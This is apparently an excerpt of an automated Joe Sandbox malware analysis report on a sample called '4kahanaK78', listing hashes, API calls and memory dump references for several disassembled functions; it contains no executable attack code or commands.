                                    • Instruction ID: 6848e15de3996628be23f43624e09a179a0b14696eba4def435a4b9af94f50d0
                                    • Opcode Fuzzy Hash: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
                                    • Instruction Fuzzy Hash: AE01AD70B00208EFD720EF68E94256CBBB1EB04304F84417AC90997394DF357A118B99
                                    APIs
                                      • Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
                                      • Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F
                                    • __Init_thread_footer.LIBCMT ref: 04B47490
                                      • Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
                                      • Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                    • String ID: DCDO$^]E*
                                    • API String ID: 4132704954-2708296792
                                    • Opcode ID: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
                                    • Instruction ID: 6f4b96e39770c75f6dbf9a5ad1d2e765e7569c03ea8a6f485ed5ebe238ee9a96
                                    • Opcode Fuzzy Hash: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
                                    • Instruction Fuzzy Hash: 2A01ADB0B00208ABCB20EF68E98256DBBB0EB44314F8401BAC91957390CB35B9109F89
                                    APIs
                                      • Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
                                      • Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F
                                    • __Init_thread_footer.LIBCMT ref: 04B47380
                                      • Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
                                      • Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                    • String ID: DCDO$EDO*
                                    • API String ID: 4132704954-3480089779
                                    • Opcode ID: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
                                    • Instruction ID: f8e536f69ee61ca72cfba216928ad109341b111eb874ba451fd152c23f1c1cb4
                                    • Opcode Fuzzy Hash: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
                                    • Instruction Fuzzy Hash: 0F01D6F0B013089FDB10DF64E98159DB7B0EB85304F9041F9CA15573A0CB347981DB89
                                    APIs
                                      • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                      • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                    • __Init_thread_footer.LIBCMT ref: 00407119
                                      • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                      • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                      • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                    • String ID: DCDO$EDO*
                                    • API String ID: 2296764815-3480089779
                                    • Opcode ID: 057ee43e4521391655df31a4c43a3f0a7f6c0038db3df444a4ed800121ff4de1
                                    • Instruction ID: 6e88f7cd3849569d85f07cd18ee47690fbb1a730dcdea08f10a2250dba35ba50
                                    • Opcode Fuzzy Hash: 057ee43e4521391655df31a4c43a3f0a7f6c0038db3df444a4ed800121ff4de1
                                    • Instruction Fuzzy Hash: 1F0186B0F01208AFC710DF55E98255DB7B0E705304F90457ADA15AB3D1DB386D95CB8D
                                    APIs
                                      • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                      • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                    • __Init_thread_footer.LIBCMT ref: 00407229
                                      • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                      • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                      • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                    • String ID: DCDO$^]E*
                                    • API String ID: 2296764815-2708296792
                                    • Opcode ID: da9be0c5e5273d7ee2d012b34ad58f6f2e7d462380927887947c71f03af37cc5
                                    • Instruction ID: 8efc7060af64cb8acb1af25de2c4b339d239c6825e953d18f5e204f1a235d67b
                                    • Opcode Fuzzy Hash: da9be0c5e5273d7ee2d012b34ad58f6f2e7d462380927887947c71f03af37cc5
                                    • Instruction Fuzzy Hash: 8F016D70F002089BC720EF68E94295DB7B0EB08304F9441BEE919A7396DB3969158BCE